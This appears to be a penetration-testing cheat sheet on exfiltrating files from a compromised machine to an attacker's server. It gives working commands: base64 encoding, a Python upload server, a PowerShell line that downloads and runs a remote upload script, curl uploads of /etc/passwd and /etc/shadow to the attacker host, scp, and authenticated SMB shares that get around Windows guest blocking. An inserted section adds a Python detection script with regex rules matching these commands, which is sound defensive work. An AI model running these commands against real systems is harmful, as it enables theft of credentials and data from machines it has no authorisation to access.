Exfiltration is the process of transferring files from a target machine to an attack host. This can be useful for tasks like password cracking, data analysis, or collecting sensitive information.
Copy/Paste Base64
Windows
# Convert the contents of a file to a Base64-encoded string
[Convert]::ToBase64String((Get-Content -Path "C:\Users\Public\exfil.txt" -Encoding byte))
Linux
# Convert the contents of a file to a Base64-encoded string
cat test.txt | base64 -w 0; echo
Uploadserver
The easiest way to exfiltrate files from the target machine is to set up our own HTTP server. We can use the Python3 uploadserver module for this.
There are two ways to start this server: using either HTTP or HTTPS (with a self-signed certificate).
HTTP
# Start HTTP server (Attacker machine)
python3 -m uploadserver
HTTPS
# Create a self-signed certificate
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
# Create a new directory (the web server should not host the certificate)
mkdir https && cd https
# Start HTTPS server (Attacker machine)
sudo python3 -m uploadserver 443 --server-certificate ../server.pem
Uploading files with PowerShell
For uploading files to our server using PowerShell, we can use the PSUpload.ps1 script on Windows.
Warning
If you are using HTTPS as the server, you need to run this first:
# Download the PSUpload.ps1 script
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
# Invoke the script to upload a file
Invoke-FileUpload -Uri https://$IP/upload -File C:\Users\Public\exfil.txt
Uploading files with cURL
For uploading files to our server on Linux, we can use the curl command.
# Upload a single file (<FILE> is a placeholder for the path of the file to send)
curl -X POST https://$IP/upload -F 'files=@<FILE>' -k
# Upload multiple files
curl -X POST https://$IP/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' -k
SSH
The Secure Shell Protocol (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network. Its most notable applications are remote login and command-line execution.
SCP (secure copy) is a command-line utility that allows you to copy files and directories between two hosts securely.
# Upload file to target
scp test.txt root@$IP:/tmp/
SMB
The Server Message Block (SMB) is a client-server protocol that regulates access to files and entire directories and other network resources such as printers, routers, or interfaces released for the network.
For transferring files using SMB, we need to set up an SMB server on our attack machine, then copy or move the files between the attack and target machines.
# Create the SMB server (Attacker machine)
sudo impacket-smbserver share -smb2support /tmp/smbshare
# Mount the SMB server (Target machine)
> net use n: \\$IP\share
> copy C:\Users\Public\test.txt n:\
Newer versions of Windows block unauthenticated guest access to SMB. To bypass this, we can set up an SMB server with authentication and then mount it on the target machine.
# Create the SMB server with Authentication (Attacker machine)
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
# Mount the SMB server (Target machine)
> net use n: \\$IP\share /user:test test
> copy C:\Users\Public\test.txt n:\
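The command shapes shown above are visible in process-creation telemetry, so a defender can match them and score each host. The following is an added example, not part of the original page; the rule names, weights, threshold, event layout and sample events are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# (rule name, weight, pattern). Names and weights are choices made for this
# example; each pattern targets a command shape shown on this page.
RULES = [
    ("ps_base64_file_encode", 2, re.compile(r"\[convert\]::tobase64string\(.*get-content", re.I)),
    ("sh_base64_single_line", 1, re.compile(r"\bbase64\b.*\s-w\s*0\b")),
    ("ps_download_cradle", 3, re.compile(r"\biex\b.*net\.webclient.*downloadstring", re.I)),
    ("curl_multipart_file_upload", 2, re.compile(r"\bcurl\b.*\s(?:-F|--form)\s+\S*=@")),
    ("curl_tls_verify_disabled", 1, re.compile(r"\bcurl\b.*\s(?:-k|--insecure)\b")),
    ("smb_mount_by_ip_literal", 2, re.compile(r"\bnet\s+use\b.*\\\\\d{1,3}(?:\.\d{1,3}){3}\\", re.I)),
    ("scp_to_remote_host", 1, re.compile(r"\bscp\b.*\s\S+@\S+:")),
]

def match_rules(cmdline):
    """Return the names of all rules whose pattern matches one command line."""
    return [name for name, _, rx in RULES if rx.search(cmdline)]

def score_hosts(events, threshold=3):
    """Sum the weights of the distinct rules seen per host; keep hosts at or above threshold."""
    weights = {name: w for name, w, _ in RULES}
    seen = defaultdict(set)
    for ev in events:
        seen[ev["host"]].update(match_rules(ev["cmdline"]))
    scores = {h: sum(weights[r] for r in rules) for h, rules in seen.items()}
    return {h: s for h, s in scores.items() if s >= threshold}

# Constructed process-creation events (host names and addresses are made up;
# 203.0.113.0/24 is a documentation range). The build03 lines are benign lookalikes.
SAMPLE_EVENTS = [
    {"host": "ws01", "cmdline": r'powershell -c "[Convert]::ToBase64String((Get-Content -Path C:\Users\Public\exfil.txt -Encoding byte))"'},
    {"host": "ws01", "cmdline": r"net use n: \\203.0.113.7\share /user:test test"},
    {"host": "web02", "cmdline": "curl -X POST https://203.0.113.7/upload -F files=@/etc/passwd -F files=@/etc/shadow -k"},
    {"host": "web02", "cmdline": "base64 -w 0"},
    {"host": "build03", "cmdline": "curl -f https://intranet.example/health"},
    {"host": "build03", "cmdline": r"net use s: \\fileserver\builds"},
    {"host": "build03", "cmdline": "scp artifact.tgz deploy@staging.example:/srv/releases/"},
]

if __name__ == "__main__":
    for host, score in sorted(score_hosts(SAMPLE_EVENTS).items()):
        print(host, score)
```

Low-weight rules such as `scp_to_remote_host` match routine administration on their own, which is why the score is taken per host across distinct rules rather than per command.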
FTP
The File Transfer Protocol (FTP) is a standard communication protocol used for transferring computer files between a server and a client on a network. It operates as a clear-text protocol, meaning that data is sent in an unencrypted format.